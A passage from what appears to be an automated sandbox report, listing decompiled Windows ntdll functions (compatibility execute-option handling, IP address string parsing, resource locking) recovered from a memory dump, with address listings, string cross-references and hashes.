						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E020C8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02103F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0212E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02103F92();
					_t38 = 1;
					L2:
					return E020BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                                                                          0x020e7f08
                                                                                                                                                                                                          0x020e7f0f
                                                                                                                                                                                                          0x020e7f12
                                                                                                                                                                                                          0x020e7f1b
                                                                                                                                                                                                          0x020e7f31
                                                                                                                                                                                                          0x02103ead
                                                                                                                                                                                                          0x02103eb4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02103eba
                                                                                                                                                                                                          0x02103ecd
                                                                                                                                                                                                          0x02103ed2
                                                                                                                                                                                                          0x02103ee1
                                                                                                                                                                                                          0x02103ee7
                                                                                                                                                                                                          0x02103eec
                                                                                                                                                                                                          0x02103f12
                                                                                                                                                                                                          0x02103f18
                                                                                                                                                                                                          0x02103f1a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02103f20
                                                                                                                                                                                                          0x02103f26
                                                                                                                                                                                                          0x02103f28
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02103f2e
                                                                                                                                                                                                          0x02103f30
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x02103f3a
                                                                                                                                                                                                          0x02103f3b
                                                                                                                                                                                                          0x02103f53
                                                                                                                                                                                                          0x02103f64
                                                                                                                                                                                                          0x02103f69
                                                                                                                                                                                                          0x02103f6c
                                                                                                                                                                                                          0x02103f6d
                                                                                                                                                                                                          0x02103f6f
                                                                                                                                                                                                          0x0210e304
                                                                                                                                                                                                          0x0210e30f
                                                                                                                                                                                                          0x0210e315
                                                                                                                                                                                                          0x0210e31e
                                                                                                                                                                                                          0x0210e321
                                                                                                                                                                                                          0x0210e327
                                                                                                                                                                                                          0x0210e329
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0210e32f
                                                                                                                                                                                                          0x0210e32f
                                                                                                                                                                                                          0x0210e337
                                                                                                                                                                                                          0x0210e33a
                                                                                                                                                                                                          0x0210e33b
                                                                                                                                                                                                          0x0210e33d
                                                                                                                                                                                                          0x0210e33f
                                                                                                                                                                                                          0x0210e341
                                                                                                                                                                                                          0x0210e341
                                                                                                                                                                                                          0x0210e34e
                                                                                                                                                                                                          0x0210e353
                                                                                                                                                                                                          0x0210e358
                                                                                                                                                                                                          0x0210e35d
                                                                                                                                                                                                          0x0210e35f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0210e365
                                                                                                                                                                                                          0x0210e365
                                                                                                                                                                                                          0x0210e368
                                                                                                                                                                                                          0x0210e36e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0210e374
                                                                                                                                                                                                          0x0210e32f
                                                                                                                                                                                                          0x02103f75
                                                                                                                                                                                                          0x02103f7a
                                                                                                                                                                                                          0x02103f7c
                                                                                                                                                                                                          0x02103f7e
                                                                                                                                                                                                          0x02103f86
                                                                                                                                                                                                          0x020e7f39
                                                                                                                                                                                                          0x020e7f47
                                                                                                                                                                                                          0x020e7f47
                                                                                                                                                                                                          0x020e7f37
                                                                                                                                                                                                          0x020e7f37
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02103F12
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • ExecuteOptions, xrefs: 02103F04
                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0210E345
                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0210E2FB
                                                                                                                                                                                                          • Execute=1, xrefs: 02103F5E
                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02103F75
                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02103F4A
                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02103EC4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BaseDataModuleQuery
                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                          • API String ID: 3901378454-484625025
                                                                                                                                                                                                          • Opcode ID: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                                                                                                                                                                                                          • Instruction ID: 2e74d764a87bf4877062ed67944a844692905875f6a54130b674b7ae56a885d9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9141C871A8031C7EEF21DA94DCC5FDBB3BDAF14704F0005A9E516E6090EB70AA859F65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020F0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E020F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E020C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E020BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E020F0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E020F0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E020F06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E020F06BA(_t135, _t178) == 0 || E020F0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E020F0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E020F0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E020F06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E020F06BA(_t124, _t142) == 0 || E020F0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                                                                          0x020f0b21
                                                                                                                                                                                                          0x020f0b24
                                                                                                                                                                                                          0x020f0b27
                                                                                                                                                                                                          0x020f0b2a
                                                                                                                                                                                                          0x020f0b2d
                                                                                                                                                                                                          0x020f0b30
                                                                                                                                                                                                          0x020f0b33
                                                                                                                                                                                                          0x020f0b36
                                                                                                                                                                                                          0x020f0b39
                                                                                                                                                                                                          0x020f0b3e
                                                                                                                                                                                                          0x020f0c65
                                                                                                                                                                                                          0x020f0c68
                                                                                                                                                                                                          0x020f0c6a
                                                                                                                                                                                                          0x020f0c6f
                                                                                                                                                                                                          0x0211eb42
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb48
                                                                                                                                                                                                          0x0211eb48
                                                                                                                                                                                                          0x020f0c75
                                                                                                                                                                                                          0x020f0c7a
                                                                                                                                                                                                          0x0211eb54
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb5a
                                                                                                                                                                                                          0x020f0c80
                                                                                                                                                                                                          0x020f0c84
                                                                                                                                                                                                          0x0211eb98
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eba6
                                                                                                                                                                                                          0x020f0cb8
                                                                                                                                                                                                          0x020f0cba
                                                                                                                                                                                                          0x020f0cd3
                                                                                                                                                                                                          0x020f0cda
                                                                                                                                                                                                          0x020f0ce4
                                                                                                                                                                                                          0x020f0ce9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0cec
                                                                                                                                                                                                          0x020f0c8c
                                                                                                                                                                                                          0x0211eb63
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb70
                                                                                                                                                                                                          0x0211eb75
                                                                                                                                                                                                          0x0211eb7d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb8c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb8c
                                                                                                                                                                                                          0x020f0c96
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0ca2
                                                                                                                                                                                                          0x020f0cac
                                                                                                                                                                                                          0x020f0cb4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b44
                                                                                                                                                                                                          0x020f0b47
                                                                                                                                                                                                          0x020f0b49
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b4f
                                                                                                                                                                                                          0x020f0b50
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b56
                                                                                                                                                                                                          0x020f0b62
                                                                                                                                                                                                          0x020f0b7c
                                                                                                                                                                                                          0x020f0bac
                                                                                                                                                                                                          0x020f0a0f
                                                                                                                                                                                                          0x0211eaaa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eac4
                                                                                                                                                                                                          0x0211eac4
                                                                                                                                                                                                          0x020f0bd0
                                                                                                                                                                                                          0x020f0bd0
                                                                                                                                                                                                          0x020f0bd4
                                                                                                                                                                                                          0x020f0bd9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0bdb
                                                                                                                                                                                                          0x020f0be0
                                                                                                                                                                                                          0x0211eb0e
                                                                                                                                                                                                          0x020f0a1a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0a1a
                                                                                                                                                                                                          0x0211eb1a
                                                                                                                                                                                                          0x0211eb1f
                                                                                                                                                                                                          0x0211eb27
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb36
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb36
                                                                                                                                                                                                          0x020f0bea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0bf6
                                                                                                                                                                                                          0x020f0c00
                                                                                                                                                                                                          0x020f0c03
                                                                                                                                                                                                          0x020f0c0b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c0b
                                                                                                                                                                                                          0x0211eaaa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0a15
                                                                                                                                                                                                          0x020f0bb6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0bc6
                                                                                                                                                                                                          0x020f0bc6
                                                                                                                                                                                                          0x020f0bcb
                                                                                                                                                                                                          0x020f0c15
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c1d
                                                                                                                                                                                                          0x020f0c20
                                                                                                                                                                                                          0x020f0c21
                                                                                                                                                                                                          0x020f0c24
                                                                                                                                                                                                          0x020f0c24
                                                                                                                                                                                                          0x020f0c26
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c26
                                                                                                                                                                                                          0x020f0bcd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0bcd
                                                                                                                                                                                                          0x020f0b89
                                                                                                                                                                                                          0x020f0b89
                                                                                                                                                                                                          0x020f0b90
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b96
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b96
                                                                                                                                                                                                          0x020f0a04
                                                                                                                                                                                                          0x020f0a04
                                                                                                                                                                                                          0x020f0b9a
                                                                                                                                                                                                          0x020f0b9a
                                                                                                                                                                                                          0x020f0b9b
                                                                                                                                                                                                          0x020f0b9f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0ba5
                                                                                                                                                                                                          0x020f0ac7
                                                                                                                                                                                                          0x020f0aca
                                                                                                                                                                                                          0x0211eacf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eade
                                                                                                                                                                                                          0x0211eade
                                                                                                                                                                                                          0x0211eae3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eaf3
                                                                                                                                                                                                          0x0211eaf6
                                                                                                                                                                                                          0x0211eaf7
                                                                                                                                                                                                          0x0211eafe
                                                                                                                                                                                                          0x0211eb01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb01
                                                                                                                                                                                                          0x0211eacf
                                                                                                                                                                                                          0x020f0ad0
                                                                                                                                                                                                          0x020f0ad4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0ada
                                                                                                                                                                                                          0x020f0ae6
                                                                                                                                                                                                          0x020f0c34
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c47
                                                                                                                                                                                                          0x020f0c49
                                                                                                                                                                                                          0x020f0c4a
                                                                                                                                                                                                          0x020f0c4e
                                                                                                                                                                                                          0x020f0c51
                                                                                                                                                                                                          0x020f0c54
                                                                                                                                                                                                          0x020f0c57
                                                                                                                                                                                                          0x020f0c5a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c60
                                                                                                                                                                                                          0x020f0afb
                                                                                                                                                                                                          0x020f0afe
                                                                                                                                                                                                          0x020f0b02
                                                                                                                                                                                                          0x020f0b05
                                                                                                                                                                                                          0x020f0b08
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b08
                                                                                                                                                                                                          0x020f0ae6
                                                                                                                                                                                                          0x020f0b44
                                                                                                                                                                                                          0x020f09f8
                                                                                                                                                                                                          0x020f09f8
                                                                                                                                                                                                          0x020f09f9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eaa0
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                                          • String ID: .$:$:
                                                                                                                                                                                                          • API String ID: 3965848254-2308638275
                                                                                                                                                                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction ID: c5d56884104f9ae7a5ac78f71af82edcdb178524a845c2e07e25239df6a88aee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34A1D371D8030ADFCFA5CF54C8447BEB7B7AF44308F24846ADA06A7A4AD7305645EB91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 020F0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E020F0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
									_push(_t144);
									_push(0);
									_t51 = E020AF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E020F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02103F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0213217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02103F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E020F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
												_push(_t138);
												_push(0);
												_t58 = E020AF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E020F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0213217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02103F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E020F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E020D5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E020AF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E020F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E020F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E020F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E020D5329(_t110, _t138);
																_t69 = E020D53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
